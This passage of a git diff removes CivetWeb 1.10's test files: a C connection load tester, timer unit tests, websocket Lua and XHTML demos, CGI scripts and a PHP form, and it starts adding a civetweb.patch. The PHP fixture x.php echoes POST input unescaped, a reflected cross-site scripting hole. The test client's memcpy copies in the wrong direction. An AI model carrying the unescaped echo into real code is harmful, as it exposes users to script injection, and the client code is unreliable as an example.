-    "HTTP/1.1 417 Expectation Failed", 'PUT 417 error');
-  o("PUT /a/put.txt HTTP/1.0\nExpect: 100-continue\nContent-Length: 4\n".
-    "$auth_header\nabcd",
-    "HTTP/1.1 100 Continue.+HTTP/1.1 200", 'PUT 100-Continue');
-}
-
-sub do_unit_test {
-  my $target = on_windows() ? 'wi' : 'un';
-  system("make $target") == 0 or fail("Unit test failed!");
-}
-
-print "SUCCESS! All tests passed.\n";
diff --git a/thirdparty/civetweb-1.10/test/testclient.c b/thirdparty/civetweb-1.10/test/testclient.c
deleted file mode 100644
index 5cc2edb..0000000
--- a/thirdparty/civetweb-1.10/test/testclient.c
+++ /dev/null
@@ -1,151 +0,0 @@
-#include <stdio.h>
-#include <time.h>
-
-#if defined(_WIN32) || defined(WIN32) 
-#include <windows.h>
-void INIT(void) {WSADATA wsaData; WSAStartup(MAKEWORD(2,2), &wsaData);}
-#else
-#define INIT()
-#include <unistd.h>
-#include <netdb.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <netinet/in.h>
-#endif
-
-int connect_to_server(const struct sockaddr_in * serv_addr)
-{
-    int sockfd;
-
-    /* Create a socket */
-    sockfd = socket(AF_INET, SOCK_STREAM, 0);
-    if (sockfd < 0) {
-        perror("ERROR opening socket");
-        return -1;
-    }
-
-    /* Connect to the server */
-    if (connect(sockfd, (const sockaddr *)serv_addr, sizeof(*serv_addr)) < 0) {
-         perror("ERROR connecting");
-         close(sockfd);
-         return -2;
-    }
-
-    return sockfd;
-}
-
-int send_to_server(int conn, const char * request)
-{
-    int req_len = strlen(request);
-    int n;
-
-    n = write(conn, request, req_len);
-    if (n < 0) {
-         perror("ERROR writing to socket");
-         return 0;
-    }
-
-    return (n==req_len);
-}
-
-int read_from_server(int conn)
-{
-    char rbuffer[1024];
-    int n;
-    long ret;
-
-    n = read(conn, rbuffer, sizeof(rbuffer));
-    if (n < 0) {
-         perror("ERROR reading from socket");
-         return 0;
-    }
-
-    if (strncmp("HTTP/1.", rbuffer, 7)) {
-         perror("ERROR not a HTTP response");
-         return 0;
-    }
-
-    ret = atol(rbuffer + 9);
-
-    return ret;
-}
-
-
-int main(int argc, char *argv[])
-{
-    long portno;
-    int i, con_count=1;
-    time_t t1,t2,t3,t4;
-    char wbuffer[256];
-    int connlist[1024*65];
-    int result[1024*65];
-    struct hostent *server;
-    struct sockaddr_in serv_addr;
-
-    INIT();
-
-    if (argc != 4) {
-        fprintf(stderr,"Usage:\n\t%s hostname port clients\n\n", argv[0]);
-        exit(0);
-    }
-
-    con_count = atol(argv[3]);
-    if (con_count<1) con_count=1;
-    if (con_count>1024*65) con_count=1024*65;
-
-    portno = atol(argv[2]);
-    if (portno<1l || portno>0xFFFFl) {
-        fprintf(stderr, "ERROR, invalid port\n");
-        exit(0);
-    }
-
-    server = gethostbyname(argv[1]);
-    if (server == NULL) {
-        fprintf(stderr, "ERROR, no such host\n");
-        exit(0);
-    }
-
-    memset(&serv_addr, 0, sizeof(serv_addr));
-    serv_addr.sin_family = AF_INET;
-    memcpy(server->h_addr, &serv_addr.sin_addr.s_addr, server->h_length);
-    serv_addr.sin_port = htons((short)portno);
-
-    sprintf(wbuffer, "GET / HTTP/1.0\r\n\r\n");
-
-    t1 = time(0);
-    for (i=0;i<con_count;i++) {
-        result[i] = connlist[i] = connect_to_server(&serv_addr);
-    }
-    t2 = time(0);
-    for (i=0;i<con_count;i++) {
-        if (result[i]>=0) {
-            result[i] = send_to_server(connlist[i], wbuffer);
-        }
-    }
-    t3 = time(0);
-    for (i=0;i<con_count;i++) {
-        if (result[i]>=0) {
-            result[i] = read_from_server(connlist[i]);
-        }
-    }
-    t4 = time(0);
-
-    printf("\n");
-    printf("conn:  %.0lf\n", difftime(t2,t1));
-    printf("write: %.0lf\n", difftime(t3,t2));
-    printf("read:  %.0lf\n", difftime(t4,t3));
-
-    for (i=-10;i<1000;i++) {
-        int j,cnt=0;
-        for(j=0;j<con_count;j++) {
-            if (result[j]==i) cnt++;
-        }
-        if (cnt>0) {
-            printf("%5i\t%7i\n", i, cnt);
-        }
-    }
-
-    return 0;
-}
-
-
diff --git a/thirdparty/civetweb-1.10/test/timeout.cgi b/thirdparty/civetweb-1.10/test/timeout.cgi
deleted file mode 100755
index 3248205..0000000
--- a/thirdparty/civetweb-1.10/test/timeout.cgi
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/usr/bin/env perl
-
-# Make stdout unbuffered
-use FileHandle;
-STDOUT->autoflush(1);
-
-# This script outputs some content, then sleeps for 5 seconds, then exits.
-# Web server should return the content immediately after it is sent,
-# not waiting until the script exits.
-print "Content-Type: text/html\r\n\r\n";
-print "Some data";
-sleep 3;
diff --git a/thirdparty/civetweb-1.10/test/timertest.c b/thirdparty/civetweb-1.10/test/timertest.c
deleted file mode 100644
index 3ee98dc..0000000
--- a/thirdparty/civetweb-1.10/test/timertest.c
+++ /dev/null
@@ -1,350 +0,0 @@
-/* Copyright (c) 2016-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-/**
- * We include the source file so that we have access to the internal private
- * static functions
- */
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#endif
-
-#if defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-#define CIVETWEB_API static
-#define USE_TIMERS
-
-#include "../src/civetweb.c"
-
-#include <stdlib.h>
-#include <time.h>
-
-#include "timertest.h"
-
-static int action_dec_ret;
-
-static int
-action_dec(void *arg)
-{
-	int *p = (int *)arg;
-	(*p)--;
-
-	if (*p < -1) {
-		ck_abort_msg("Periodic timer called too often");
-		/* return 0 here would be unreachable code */
-	}
-
-	return (*p >= -3) ? action_dec_ret : 0;
-}
-
-
-static int
-action_dec_to_0(void *arg)
-{
-	int *p = (int *)arg;
-	(*p)--;
-
-	if (*p <= -1) {
-		ck_abort_msg("Periodic timer called too often");
-		/* return 0 here would be unreachable code */
-	}
-
-	return (*p > 0);
-}
-
-
-START_TEST(test_timer_cyclic)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	action_dec_ret = 1;
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	c[0] = 100;
-	timer_add(&ctx, 0.05, 0.1, 1, action_dec, c + 0);
-	c[2] = 20;
-	timer_add(&ctx, 0.25, 0.5, 1, action_dec, c + 2);
-	c[1] = 50;
-	timer_add(&ctx, 0.1, 0.2, 1, action_dec, c + 1);
-
-	mark_point();
-
-	mg_sleep(10000); /* Sleep 10 second - timers will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(2000); /* Sleep 2 second - timers will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-
-	/* If this test runs in a virtual environment, like the CI unit test
-	 * containers, there might be some timing deviations, so check the
-	 * counter with some tolerance. */
-
-	ck_assert_int_ge(c[0], -1);
-	ck_assert_int_le(c[0], +1);
-	ck_assert_int_ge(c[1], -1);
-	ck_assert_int_le(c[1], +1);
-	ck_assert_int_ge(c[2], -1);
-	ck_assert_int_le(c[2], +1);
-}
-END_TEST
-
-
-START_TEST(test_timer_oneshot_by_callback_retval)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	action_dec_ret = 0;
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	c[0] = 10;
-	timer_add(&ctx, 0, 0.1, 1, action_dec, c + 0);
-	c[2] = 2;
-	timer_add(&ctx, 0, 0.5, 1, action_dec, c + 2);
-	c[1] = 5;
-	timer_add(&ctx, 0, 0.2, 1, action_dec, c + 1);
-
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-	mg_sleep(100);
-
-	ck_assert_int_eq(c[0], 9);
-	ck_assert_int_eq(c[1], 4);
-	ck_assert_int_eq(c[2], 1);
-}
-END_TEST
-
-
-START_TEST(test_timer_oneshot_by_timer_add)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	action_dec_ret = 1;
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	c[0] = 10;
-	timer_add(&ctx, 0, 0, 1, action_dec, c + 0);
-	c[2] = 2;
-	timer_add(&ctx, 0, 0, 1, action_dec, c + 2);
-	c[1] = 5;
-	timer_add(&ctx, 0, 0, 1, action_dec, c + 1);
-
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-	mg_sleep(100);
-
-	ck_assert_int_eq(c[0], 9);
-	ck_assert_int_eq(c[1], 4);
-	ck_assert_int_eq(c[2], 1);
-}
-END_TEST
-
-
-START_TEST(test_timer_mixed)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	/* 3 --> 2, because it is a single shot timer */
-	c[0] = 3;
-	timer_add(&ctx, 0, 0, 1, action_dec_to_0, &c[0]);
-
-	/* 3 --> 0, because it will run until c[1] = 0 and then stop */
-	c[1] = 3;
-	timer_add(&ctx, 0, 0.2, 1, action_dec_to_0, &c[1]);
-
-	/* 3 --> 1, with 750 ms period, it will run once at start,
-	 * then once 750 ms later, but not 1500 ms later, since the
-	 * timer is already stopped then. */
-	c[2] = 3;
-	timer_add(&ctx, 0, 0.75, 1, action_dec_to_0, &c[2]);
-
-	/* 3 --> 2, will run at start, but no cyclic in 1 second */
-	c[3] = 3;
-	timer_add(&ctx, 0, 2.5, 1, action_dec_to_0, &c[3]);
-
-	/* 3 --> 3, will not run at start */
-	c[4] = 3;
-	timer_add(&ctx, 2.5, 0.1, 1, action_dec_to_0, &c[4]);
-
-	/* 3 --> 2, an absolute timer in the past (-123.456) will still
-	 * run once at start, and then with the period */
-	c[5] = 3;
-	timer_add(&ctx, -123.456, 2.5, 0, action_dec_to_0, &c[5]);
-
-	/* 3 --> 1, an absolute timer in the past (-123.456) will still
-	 * run once at start, and then with the period */
-	c[6] = 3;
-	timer_add(&ctx, -123.456, 0.75, 0, action_dec_to_0, &c[6]);
-
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-	mg_sleep(100);
-
-	ck_assert_int_eq(c[0], 2);
-	ck_assert_int_eq(c[1], 0);
-	ck_assert_int_eq(c[2], 1);
-	ck_assert_int_eq(c[3], 2);
-	ck_assert_int_eq(c[4], 3);
-	ck_assert_int_eq(c[5], 2);
-	ck_assert_int_eq(c[6], 1);
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_timertest_suite(void)
-{
-	Suite *const suite = suite_create("Timer");
-
-	TCase *const tcase_timer_cyclic = tcase_create("Timer Periodic");
-	TCase *const tcase_timer_oneshot = tcase_create("Timer Single Shot");
-	TCase *const tcase_timer_mixed = tcase_create("Timer Mixed");
-
-	tcase_add_test(tcase_timer_cyclic, test_timer_cyclic);
-	tcase_set_timeout(tcase_timer_cyclic, 30);
-	suite_add_tcase(suite, tcase_timer_cyclic);
-
-	tcase_add_test(tcase_timer_oneshot, test_timer_oneshot_by_timer_add);
-	tcase_add_test(tcase_timer_oneshot, test_timer_oneshot_by_callback_retval);
-	tcase_set_timeout(tcase_timer_oneshot, 30);
-	suite_add_tcase(suite, tcase_timer_oneshot);
-
-	tcase_add_test(tcase_timer_mixed, test_timer_mixed);
-	tcase_set_timeout(tcase_timer_mixed, 30);
-	suite_add_tcase(suite, tcase_timer_mixed);
-
-	return suite;
-}
-#endif
-
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-/* Used to debug test cases without using the check framework */
-
-void
-TIMER_PRIVATE(void)
-{
-	unsigned f_avail;
-	unsigned f_ret;
-
-#if defined(_WIN32)
-	WSADATA data;
-	WSAStartup(MAKEWORD(2, 2), &data);
-#endif
-
-	f_avail = mg_check_feature(0xFF);
-	f_ret = mg_init_library(f_avail);
-	ck_assert_uint_eq(f_ret, f_avail);
-
-	test_timer_cyclic(0);
-	test_timer_oneshot_by_timer_add(0);
-	test_timer_oneshot_by_callback_retval(0);
-	test_timer_mixed(0);
-
-	mg_exit_library();
-
-#if defined(_WIN32)
-	WSACleanup();
-#endif
-}
-
-#endif
diff --git a/thirdparty/civetweb-1.10/test/timertest.h b/thirdparty/civetweb-1.10/test/timertest.h
deleted file mode 100644
index 844a01b..0000000
--- a/thirdparty/civetweb-1.10/test/timertest.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_TIMER_H_
-#define TEST_TIMER_H_
-
-#include "civetweb_check.h"
-
-Suite *make_timertest_suite(void);
-
-#endif /* TEST_TIMER_H_ */
diff --git a/thirdparty/civetweb-1.10/test/websocket.lua b/thirdparty/civetweb-1.10/test/websocket.lua
deleted file mode 100644
index 7338ed8..0000000
--- a/thirdparty/civetweb-1.10/test/websocket.lua
+++ /dev/null
@@ -1,118 +0,0 @@
-timerID = "timeout"
---timerID = "interval"
-
-function trace(text)
-    local f = io.open("websocket.trace", "a")
-    f:write(os.date() .. " - " .. text .. "\n")
-    f:close()
-end
-
-function iswebsocket()
-  return mg.lua_type == "websocket"
-  --return pcall(function()
-  --  if (string.upper(mg.request_info.http_headers.Upgrade)~="WEBSOCKET") then error("") end
-  --end)
-end
-
-trace("called with Lua type " .. tostring(mg.lua_type))
-
-if not iswebsocket() then
-  trace("no websocket")
-  mg.write("HTTP/1.0 403 Forbidden\r\n")
-  mg.write("Connection: close\r\n")
-  mg.write("\r\n")
-  mg.write("forbidden")
-  return
-end
-
-
--- Serialize table to string
-function ser(val)
-  local t
-  if type(val) == "table" then
-    for k,v in pairs(val) do
-      if t then
-        t = t .. ", " .. ser(k) .. "=" .. ser(v)
-      else
-        t = "{" .. ser(k) .. "=" .. ser(v)
-      end
-    end
-    t = t .. "}"
-  else
-    t = tostring(val)
-  end
-  return t
-end
-
--- table of all active connection
-allConnections = {}
-
--- function to get a client identification string
-function who(tab)
-  local ri = allConnections[tab.client].request_info
-  return ri.remote_addr .. ":" .. ri.remote_port
-end
-
--- Callback to accept or reject a connection
-function open(tab)
-  allConnections[tab.client] = tab
-  trace("open[" .. who(tab) .. "]: " .. ser(tab))
-  return true -- return true to accept the connection
-end
-
--- Callback for "Websocket ready"
-function ready(tab)
-  trace("ready[" .. who(tab) .. "]: " .. ser(tab))
-  mg.write(tab.client, "text", "Websocket ready")
-  mg.write(tab.client, 1, "-->h 180");
-  mg.write(tab.client, "-->m 180");
-  senddata()
-  if timerID == "timeout" then
-    mg.set_timeout("timer()", 1)
-  elseif timerID == "interval" then
-    mg.set_interval("timer()", 1)
-  end
-  return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket received data"
-function data(tab)
-    trace("data[" .. who(tab) .. "]: " .. ser(tab))
-    senddata()
-    return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket is closing"
-function close(tab)
-    trace("close[" .. who(tab) .. "]: " .. ser(tab))
-    mg.write("text", "end")
-    allConnections[tab.client] = nil
-end
-
-function senddata()
-    local date = os.date('*t');
-    local hand = (date.hour%12)*60+date.min;
-
-    mg.write("text", string.format("%u:%02u:%02u", date.hour, date.min, date.sec));
-
-    if (hand ~= lasthand) then
-        mg.write(1, string.format("-->h %u", hand*360/(12*60)));
-        mg.write(   string.format("-->m %u", date.min*360/60));
-        lasthand = hand;
-    end
-
-    if bits and content then
-        data(bits, content)
-    end
-end
-
-function timer()
-    trace("timer")
-    senddata()
-    if timerID == "timeout" then
-        mg.set_timeout("timer()", 1)
-    else
-        return true -- return true to keep an interval timer running
-    end
-end
-
diff --git a/thirdparty/civetweb-1.10/test/websocket.xhtml b/thirdparty/civetweb-1.10/test/websocket.xhtml
deleted file mode 100644
index 3e0828f..0000000
--- a/thirdparty/civetweb-1.10/test/websocket.xhtml
+++ /dev/null
@@ -1,117 +0,0 @@
-<!DOCTYPE HTML>

-<html xmlns="http://www.w3.org/1999/xhtml">

-<head>

-  <meta charset="UTF-8"></meta>

-  <title>Websocket test</title>

-  <style type="text/css" media="screen">

-    body { background:#eee; margin:0 }

-    .main {

-      display:block; border:1px solid #ccc; position:absolute;

-      top:5%; left:5%; width:90%; height:90%; background:#fff;

-    }

-  </style>

-</head>

-<body>

-  <script type="text/javascript"><![CDATA[

-

-    var connection;

-    var websock_text_field;

-    var hand_hour;

-    var hand_min;

-

-    function queryStringElem(name, idx) {

-      if (typeof(queryStringElem_Table) != "object") {

-        queryStringElem_Table = {};

-        window.location.search.slice(1).split('&').forEach(

-          function(keyValuePair) {

-            keyValuePair = keyValuePair.split('=');

-            if (typeof(queryStringElem_Table[keyValuePair[0]]) != "object") {

-              queryStringElem_Table[keyValuePair[0]] = [];

-            }

-            var idx = queryStringElem_Table[keyValuePair[0]].length+1;

-            queryStringElem_Table[keyValuePair[0]][idx] = keyValuePair[1] || '';

-          }

-        );

-      }

-      idx = idx || 1;

-      if (queryStringElem_Table[name]) {

-        return queryStringElem_Table[name][idx];

-      }

-      return null;

-    }

-

-    function webSockKeepAlive() {

-      if (keepAlive) {

-        connection.send('client still alive');

-        console.log('send keep alive')

-        setTimeout("webSockKeepAlive()", 10000);

-      }

-    }

-

-    function load() {

-      var wsproto = (location.protocol === 'https:') ? "wss:" : "ws:";

-      connection = new WebSocket(wsproto + "//" + window.location.host + "/websocket.lua");

-      websock_text_field = document.getElementById('websock_text_field');

-      hand_min = document.getElementById('hand_min');

-      hand_hour = document.getElementById('hand_hour');

-

-      var ka = queryStringElem("keepAlive");

-      if (ka) {

-        ka = ka.toLowerCase();

-        use_keepAlive = (ka!="false") && (ka!="f") && (ka!="no") && (ka!="n") && (ka!=0);

-      } else {

-        use_keepAlive = true;

-      }

-

-      connection.onopen = function () {

-        keepAlive = use_keepAlive;

-        webSockKeepAlive();

-      };

-

-      // Log errors

-      connection.onerror = function (error) {

-        keepAlive = false;

-        alert("WebSocket error");

-        connection.close();

-      };

-

-      // Log messages from the server

-      connection.onmessage = function (e) {

-        var lCmd = e.data.substring(0,3);

-        if (lCmd == "-->") {

-          console.log(e.data);

-          var lDirection = Number(e.data.substring(5));

-          if (e.data[3] == 'h') {

-            hand_hour.setAttribute("transform", "rotate(" + lDirection + " 800 600)");

-          }

-          if (e.data[3] == 'm') {

-            hand_min.setAttribute("transform", "rotate(" + lDirection + " 800 600)");

-          }

-        } else {

-          websock_text_field.textContent = e.data;

-        }

-      };

-

-      console.log("load");

-    }

-

-  ]]></script>

-

-<svg class="main"

-  xmlns="http://www.w3.org/2000/svg"

-  xmlns:svg="http://www.w3.org/2000/svg"

-  version="1.1"

-  xmlns:xlink="http://www.w3.org/1999/xlink"

-  viewBox="0 0 1600 1200" preserveAspectRatio="xMinYMin meet"

-  onload="load()"

-  >

-

-  <circle id="line_a" cx="800" cy="600" r="500" style="stroke:rgb(255,0,0); stroke-width:5; fill:rgb(200,200,200)"/>

-  <polygon points="800,200 900,300 850,300 850,600 750,600 750,300 700,300" style="fill:rgb(100,0,0)" transform="rotate(0,800,600)" id="hand_hour"/>

-  <polygon points="800,100 840,200 820,200 820,600 780,600 780,200 760,200" style="fill:rgb(0,100,0)" transform="rotate(0,800,600)" id="hand_min"/>

-  <text id="websock_text_field" x="800" y="600" text-anchor="middle" font-size="50px" fill="red">No websocket connection yet</text>

-

-</svg>

-

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/windows.cgi b/thirdparty/civetweb-1.10/test/windows.cgi
deleted file mode 100644
index d8aaabc..0000000
--- a/thirdparty/civetweb-1.10/test/windows.cgi
+++ /dev/null
@@ -1,2 +0,0 @@
-#!windows.cgi.cmd

-

diff --git a/thirdparty/civetweb-1.10/test/windows.cgi.cmd b/thirdparty/civetweb-1.10/test/windows.cgi.cmd
deleted file mode 100644
index 779abad..0000000
--- a/thirdparty/civetweb-1.10/test/windows.cgi.cmd
+++ /dev/null
@@ -1,7 +0,0 @@
-@echo off
-@rem echo HTTP/1.1 200 OK -- sent by framework
-echo Connection: close
-echo.
-echo CGI test:
-echo.
-set
diff --git a/thirdparty/civetweb-1.10/test/windows_fail.cgi b/thirdparty/civetweb-1.10/test/windows_fail.cgi
deleted file mode 100644
index 606fbd2..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail.cgi
+++ /dev/null
@@ -1,2 +0,0 @@
-#!r:\windows_fail.cgi.cmd

-

diff --git a/thirdparty/civetweb-1.10/test/windows_fail.cgi.cmd b/thirdparty/civetweb-1.10/test/windows_fail.cgi.cmd
deleted file mode 100644
index 715c061..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail.cgi.cmd
+++ /dev/null
@@ -1,2 +0,0 @@
-@echo off
-echo Some error sent to stderr 1>&2
diff --git a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi b/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi
deleted file mode 100644
index 198225a..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi
+++ /dev/null
@@ -1,2 +0,0 @@
-#!r:\windows_fail_silent.cgi.cmd

-

diff --git a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi.cmd b/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi.cmd
deleted file mode 100644
index bb2bf1b..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi.cmd
+++ /dev/null
@@ -1,3 +0,0 @@
-@echo off
-echo not a complete header
-echo and nothing sent to stderr
diff --git a/thirdparty/civetweb-1.10/test/ws_status.lua b/thirdparty/civetweb-1.10/test/ws_status.lua
deleted file mode 100644
index a19505b..0000000
--- a/thirdparty/civetweb-1.10/test/ws_status.lua
+++ /dev/null
@@ -1,137 +0,0 @@
-if mg.lua_type ~= "websocket" then
-  mg.write("HTTP/1.0 200 OK\r\n")
-  mg.write("Connection: close\r\n")
-  mg.write("\r\n")
-  mg.write("<!DOCTYPE HTML>\r\n")
-  mg.write("<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n")
-  mg.write("<head>\r\n")
-  mg.write("<meta charset=\"UTF-8\"></meta>\r\n")
-  mg.write("<title>Server stats</title>\r\n")
-  mg.write("</head>\r\n")
-  mg.write("<body onload=\"load()\">\r\n")
-  mg.write([====[
-  <script type="text/javascript">
-
-    var connection;
-    var data_field;
-
-    function webSockKeepAlive() {
-      if (keepAlive) {
-        connection.send('Ok');
-        setTimeout("webSockKeepAlive()", 10000);
-      }
-    }
-
-    function load() {
-      var wsproto = (location.protocol === 'https:') ? "wss:" : "ws:";
-      connection = new WebSocket(wsproto + "//" + window.location.host + window.location.pathname);
-      data_field = document.getElementById('data');
-
-      data_field.innerHTML = "wait for data";
-
-      use_keepAlive = true;
-
-      connection.onopen = function () {
-        keepAlive = use_keepAlive;
-        webSockKeepAlive();
-      };
-
-      // Log errors
-      connection.onerror = function (error) {
-        keepAlive = false;
-        alert("WebSocket error");
-        connection.close();
-      };
-
-      // Log messages from the server
-      connection.onmessage = function (e) {
-          data_field.innerHTML = e.data;
-      };
-    }
-
-</script>
-]====])
-
-  mg.write("<div id='data'>Wait for page load</div>\r\n")
-  mg.write("</body>\r\n")
-  mg.write("</html>\r\n")
-  return
-end
-
-
-function table.count(tab)
-  local count = 0
-  for _ in pairs(tab) do
-    count = count + 1
-  end
-  return count
-end
-
-
--- table of all active connection
-allConnections = {}
-connCount = table.count(allConnections)
-
-
--- function to get a client identification string
-function who(tab)
-  local ri = allConnections[tab.client].request_info
-  return ri.remote_addr .. ":" .. ri.remote_port
-end
-
--- Callback to accept or reject a connection
-function open(tab)
-  allConnections[tab.client] = tab
-  connCount = table.count(allConnections)
-  return true -- return true to accept the connection
-end
-
--- Callback for "Websocket ready"
-function ready(tab)
-  senddata()
-  return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket received data"
-function data(tab)
-    senddata()
-    return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket is closing"
-function close(tab)
-    allConnections[tab.client] = nil
-    connCount = table.count(allConnections)
-end
-
-function senddata()
-    local date = os.date('*t');
-
-    collectgarbage("collect"); -- Avoid adding uncollected Lua memory from this state
-
-    mg.write(string.format([[
-{"Time": "%u:%02u:%02u",
- "Date": "%04u-%02u-%02u",
- "Context": %s,
- "Common": %s,
- "System": \"%s\",
- "ws_status": {"Memory": %u, "Connections": %u}
-}]],
-date.hour, date.min, date.sec,
-date.year, date.month, date.day,
-mg.get_info("context"), 
-mg.get_info("common"), 
-mg.get_info("system"),
-collectgarbage("count")*1024,
-connCount
-));
-
-end
-
-function timer()
-    senddata()
-    mg.set_timeout("timer()", 1)    
-end
-
-mg.set_timeout("timer()", 1)
-
diff --git a/thirdparty/civetweb-1.10/test/x.php b/thirdparty/civetweb-1.10/test/x.php
deleted file mode 100644
index cd32842..0000000
--- a/thirdparty/civetweb-1.10/test/x.php
+++ /dev/null
@@ -1,9 +0,0 @@
-<html>
-  <form method="post">
-    <input name="x" type="text" />
-    <input type="submit" />
-  </form>
-
-  <? echo $_POST["x"]; ?>
-  
-</html>
diff --git a/thirdparty/civetweb/civetweb.patch b/thirdparty/civetweb/civetweb.patch
new file mode 100644
index 0000000..c55ce58
--- /dev/null
+++ b/thirdparty/civetweb/civetweb.patch
@@ -0,0 +1,61 @@
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 2c08bd28..ccb4fd7f 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -101,7 +101,7 @@ message(STATUS "Lua CGI support - ${CIVETWEB_ENABLE_LUA}")
+ # Enable installing CivetWeb executables
+ option(CIVETWEB_INSTALL_EXECUTABLE "Enable installing CivetWeb executable" ON)
+ mark_as_advanced(FORCE CIVETWEB_INSTALL_EXECUTABLE) # Advanced users can disable
+-message(STATUS "Executable installation - ${CIVETWEB_INSTALL_EXECUTABLE}") 
++message(STATUS "Executable installation - ${CIVETWEB_INSTALL_EXECUTABLE}")
+ 
+ # Allow builds to complete with warnings (do not set -Werror)
+ # CivetWeb Linux support is stable:
+@@ -294,8 +294,8 @@ if (MINGW)
+ endif()
+ if (NOT CIVETWEB_ALLOW_WARNINGS)
+   add_c_compiler_flag(-Werror)
++  add_c_compiler_flag(/WX)
+ endif()
+-add_c_compiler_flag(/WX)
+ add_c_compiler_flag(-pedantic-errors)
+ add_c_compiler_flag(-fvisibility=hidden)
+ add_c_compiler_flag(-fstack-protector-strong RELEASE)
+diff --git a/src/civetweb.c b/src/civetweb.c
+index c0ccbaa2..c692d1c8 100644
+--- a/src/civetweb.c
++++ b/src/civetweb.c
+@@ -14202,7 +14202,7 @@ ssl_get_protocol(int version_id)
